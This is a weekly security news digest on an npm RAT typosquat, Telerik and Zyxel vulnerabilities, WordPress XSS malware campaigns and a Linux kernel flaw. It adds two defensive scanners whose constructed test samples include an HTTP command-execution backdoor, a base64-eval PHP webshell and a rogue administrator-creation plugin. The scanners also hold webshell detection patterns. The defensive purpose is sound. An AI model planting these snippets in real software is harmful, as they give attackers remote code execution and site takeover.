Programmer’s Digest #85
05/30/2024-06/05/2024 RAT-Dropping npm Package, XSS Flaws In Multiple WordPress Plugins, Actively Exploited Linux Kernel Flaw And More.
1. Researchers Uncover RAT-Dropping npm Package Targeting Gulp Users
Cybersecurity researchers have found a malicious package in the npm registry, glup-debugger-log, that deploys a remote access trojan (RAT) on the machines that install it. The name typosquats the gulp build toolkit, and the package had been downloaded 175 times before it was spotted. Phylum, a software supply chain security firm, found that it ships two obfuscated files: one acts as an initial dropper that compromises the host and downloads additional malware, while the other provides persistent remote access.
The package’s “index.js” loads a second obfuscated file, “play.js”, which runs a set of checks to confirm it is on an active developer machine before going any further. If those checks pass, “play-safe.js” establishes persistence and starts an HTTP server that accepts and executes arbitrary commands. Phylum described the RAT as a curious mix of crude and sophisticated, and as another sign of how quickly malware tactics in open-source ecosystems are evolving.
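As an added example (this is not Phylum’s tooling and not the package’s own code), the following Node script shows the kind of pre-install audit that would surface a package with this shape: it flags lifecycle scripts that run code on install and scores each JavaScript file against traits that obfuscators and droppers leave behind (hex-escaped strings, `_0x…` identifiers, dynamic code execution, `child_process` use, a listening HTTP server). The sample package, its file names and their contents are constructed for the demo and are not the real malware; the indicator thresholds are assumptions, not Phylum’s.

```javascript
// Added example: pre-install audit of an unpacked npm package.
// Not Phylum's tooling and not the glup-debugger-log code; the sample
// package below is constructed and the thresholds are assumptions.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Each heuristic returns true when the source shows a trait that
// obfuscators or droppers commonly leave behind.
const INDICATORS = {
  hexEscapes: (src) => (src.match(/\\x[0-9a-f]{2}/gi) || []).length > 20,
  hexIdentifiers: (src) => (src.match(/\b_0x[0-9a-f]{4,}\b/g) || []).length > 5,
  dynamicEval: (src) => /\b(eval|Function)\s*\(/.test(src),
  childProcess: (src) => /require\(["']child_process["']\)/.test(src),
  httpServer: (src) => /\.createServer\s*\(/.test(src),
  longLines: (src) => src.split("\n").some((line) => line.length > 500),
};

// pkg = { packageJson: <parsed package.json>, files: { relativePath: source } }
function auditPackage(pkg) {
  const findings = [];
  const scripts = (pkg.packageJson && pkg.packageJson.scripts) || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (scripts[hook]) {
      findings.push({ file: "package.json", indicator: `lifecycle:${hook}`, detail: scripts[hook] });
    }
  }
  for (const [file, src] of Object.entries(pkg.files || {})) {
    if (!/\.(c|m)?js$/.test(file)) continue;
    for (const [name, test] of Object.entries(INDICATORS)) {
      if (test(src)) findings.push({ file, indicator: name });
    }
  }
  return findings;
}

// An install hook combined with any code indicator is the dropper shape: block it.
// Either alone is worth a human look; nothing at all is "ok".
function verdict(findings) {
  const hasHook = findings.some((f) => f.indicator.startsWith("lifecycle:"));
  const hasCode = findings.some((f) => !f.indicator.startsWith("lifecycle:"));
  if (hasHook && hasCode) return "block";
  if (hasHook || hasCode) return "review";
  return "ok";
}

// Constructed sample in the shape the digest describes: an install hook runs
// index.js, which loads an obfuscated play.js, which loads a play-safe.js that
// listens for commands. File contents are invented; String.raw keeps the
// backslash escapes literal so the heuristics see them as source text.
const SAMPLE_PACKAGE = {
  packageJson: { name: "example-typosquat", version: "1.0.0", scripts: { postinstall: "node index.js" } },
  files: {
    "index.js": String.raw`require("./play.js");`,
    "play.js": String.raw`const _0x4f3a=["\x63\x68\x69\x6c\x64\x5f\x70\x72\x6f\x63\x65\x73\x73","\x70\x6c\x61\x79\x2d\x73\x61\x66\x65"];
function _0x2c1d(_0x1e5f){return _0x4f3a[_0x1e5f];}
if(require("os").cpus().length>2&&process.env.HOME){Function("require('./"+_0x2c1d(1)+".js')")();}`,
    "play-safe.js": String.raw`const http=require("http"),{exec}=require("child_process");
http.createServer((req,res)=>{let b="";req.on("data",(c)=>{b+=c;});req.on("end",()=>exec(b,(e,o)=>res.end(o||String(e))));}).listen(8080);`,
  },
};

const findings = auditPackage(SAMPLE_PACKAGE);
console.log(verdict(findings), findings);
```

Run against the constructed package this reports the postinstall hook, three indicators on `play.js` (the hex-encoded strings hide the `child_process` name from a plain grep, which is exactly why the escape-count heuristic is there) and two on `play-safe.js`, and returns the verdict `block`; a package with only an ordinary `test` script and plain code returns no findings. In a real pipeline the same checks would run from a pre-install hook or a registry proxy, with `--ignore-scripts` as the default until a package has been reviewed.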
2. Exploit For Critical Progress Telerik Auth Bypass Released, Patch Now
Researchers have published a proof-of-concept (PoC) exploit script that chains two vulnerabilities in Progress Telerik Report Server into unauthenticated remote code execution (RCE): an authentication bypass (CVE-2024-4358, CVSS 9.8) that lets an unauthenticated attacker create an administrator account, and a deserialization flaw (CVE-2024-1800, CVSS 8.8) that turns a specially crafted XML payload into code execution once the attacker is authenticated. Both issues are fixed, and organizations are urged to upgrade to version 10.1.24.514 or later. Because a successful bypass leaves a new user account behind, administrators should also review the server’s user list for accounts they do not recognise.
3. XSS Flaws In Multiple WordPress Plugins Exploited To Deploy Malware
Researchers have uncovered malware campaigns exploiting cross-site scripting (XSS) vulnerabilities in WordPress plugins. The attackers leveraged known, high-severity stored XSS flaws in three plugins: WP Meta SEO (CVE-2023-6961), LiteSpeed Cache (CVE-2023-40000), and WP Statistics (CVE-2024-2194). Each lets an attacker plant a script that the site serves back to every visitor; when the visitor is a logged-in administrator, the script runs with that administrator’s session and privileges. Fastly’s security team observed the injected JavaScript installing PHP backdoors, creating rogue admin accounts, and adding tracking scripts. Patches have been available for some time, so the ongoing exploitation shows that many sites remain unpatched. WordPress administrators should update these plugins to the latest versions, and any site that ran a vulnerable version should be checked for unexpected administrator accounts and unexpected PHP files.
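To make the post-compromise check concrete, here is an added example (not Fastly’s scanner and not the campaign’s indicators) of an offline triage pass over a WordPress tree for the kinds of artefacts described above: PHP dropped into the uploads directory, webshell-style code, code that assigns the administrator role, and script tags pulling from hosts the site does not normally use. The tree is passed in as a map of path to contents so it runs without a WordPress install; the sample tree, the file contents, the hostnames and the regular expressions are all constructed for the demo, and the patterns are generic heuristics rather than IOCs from this campaign.

```javascript
// Added example: offline triage of a WordPress tree for artefacts like those
// the digest describes. Not Fastly's code and not the campaign's IOCs; the
// patterns are generic heuristics and the sample tree is constructed.

const PHP_FILE = /\.ph(p\d?|tml)$/i;

// Classic webshell shapes: decode-then-eval, or shelling out with request input.
const WEBSHELL_PATTERNS = [
  /\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(/i,
  /\b(system|shell_exec|passthru|exec|popen)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b/i,
  /\bassert\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b/i,
];

// Code that hands out the administrator role; legitimate in a few plugins,
// suspicious in mu-plugins, themes or uploads, so it is reported for review.
const ADMIN_ROLE = /set_role\s*\(\s*["']administrator["']\s*\)|["']role["']\s*=>\s*["']administrator["']/;

const SCRIPT_SRC = /<script[^>]+src=["']([^"']+)["']/gi;

// tree = { relativePath: contents }
// allowedHosts = hosts the site legitimately loads scripts from (assumption: supplied by the operator)
function triageTree(tree, allowedHosts) {
  const findings = [];
  const allowed = new Set(allowedHosts.map((h) => h.toLowerCase()));
  for (const [path, contents] of Object.entries(tree)) {
    const isPhp = PHP_FILE.test(path);
    // Uploads should never contain executable PHP; its presence is a finding on its own.
    if (isPhp && path.startsWith("wp-content/uploads/")) {
      findings.push({ path, indicator: "php-in-uploads" });
    }
    if (isPhp && WEBSHELL_PATTERNS.some((re) => re.test(contents))) {
      findings.push({ path, indicator: "webshell-pattern" });
    }
    if (isPhp && ADMIN_ROLE.test(contents)) {
      findings.push({ path, indicator: "admin-role-assignment" });
    }
    for (const m of contents.matchAll(SCRIPT_SRC)) {
      let host;
      try {
        host = new URL(m[1]).hostname.toLowerCase();
      } catch {
        continue; // relative src: same origin, not a third-party script
      }
      if (!allowed.has(host)) findings.push({ path, indicator: "external-script", detail: host });
    }
  }
  return findings;
}

// Constructed sample tree: one clean core file, one clean plugin, one dropped
// backdoor in uploads, one mu-plugin that creates an admin, one theme footer
// with an injected tracker. Hostnames use reserved .invalid TLDs.
const SAMPLE_TREE = {
  "index.php": '<?php require __DIR__ . "/wp-blog-header.php";',
  "wp-content/plugins/example-plugin/example-plugin.php":
    '<?php /* ordinary plugin bootstrap */ add_action("init", "example_plugin_init");',
  "wp-content/uploads/2024/05/cache.php": '<?php eval(base64_decode($_POST["d"])); ?>',
  "wp-content/mu-plugins/seo-helper.php":
    '<?php $id = wp_create_user("wpsupport", "Passw0rd!", "support@example.invalid"); (new WP_User($id))->set_role("administrator");',
  "wp-content/themes/example-theme/footer.php":
    '<script src="https://cdn.example-tracker.invalid/t.js"></script><script src="/wp-includes/js/wp-embed.min.js"></script>',
};

const report = triageTree(SAMPLE_TREE, ["example.com"]);
console.log(report);
```

On the sample tree this reports four findings: the uploads file twice (it is PHP in uploads and it matches a webshell pattern), the mu-plugin for the administrator role assignment, and the theme footer for the tracker host, while the same-origin script and the clean files produce nothing. Feeding it a real install means walking the document root into the same map; run it against a known-good copy first so the allowlist and any legitimate role-assignment hits are understood before triaging the suspect site.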
4. Zyxel Releases Patches for Firmware Vulnerabilities in EoL NAS Models
Zyxel has issued updates for critical flaws in two NAS models that are already end-of-life, a step it took because of the severity of the issues. Three of the five vulnerabilities allow unauthenticated attackers to execute OS commands and arbitrary code.
Affected models include NAS326 (versions V5.21(AAZF.16)C0 and earlier) and NAS542 (versions V5.21(ABAG.13)C0 and earlier). These issues are fixed in versions V5.21(AAZF.17)C0 and V5.21(ABAG.14)C0.
The five flaws are:
- CVE-2024-29972: Command injection in the “remote_help-cgi” program via a crafted HTTP POST request (unauthenticated).
- CVE-2024-29973: Command injection via the “setCookie” parameter (unauthenticated).
- CVE-2024-29974: Remote code execution via “file_upload-cgi” by uploading a crafted configuration file (unauthenticated).
- CVE-2024-29975: Improper privilege management that lets an authenticated local attacker with administrator privileges execute system commands as root.
- CVE-2024-29976: Improper privilege management that lets an authenticated attacker obtain session information, including the cookies of other logged-in users.
Outpost24’s Timothy Hjort reported the flaws. Owners of these models should install the fixed firmware now and, since the devices are end-of-life and will not receive further updates, keep them off the Internet and plan their replacement.
5. CISA Alerts Federal Agencies to Patch Actively Exploited Linux Kernel Flaw
CISA on Thursday added a Linux kernel flaw, CVE-2024-1086, to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The high-severity issue (CVSS 7.8) is a use-after-free bug in the netfilter component that lets a local attacker escalate privileges to root. Also added to the catalog is a newly disclosed flaw in Check Point network gateway security products (CVE-2024-24919, CVSS 7.5) that allows an unauthenticated attacker to read sensitive information from Internet-connected gateways with remote access VPN or mobile access enabled.
Given the active exploitation of CVE-2024-1086 and CVE-2024-24919, federal civilian agencies are required to apply the fixes by June 20, 2024, and other organizations would do well to treat that as their own deadline. Where a kernel cannot be updated immediately, disabling unprivileged user namespaces removes the route an unprivileged local user needs to reach the vulnerable nf_tables code.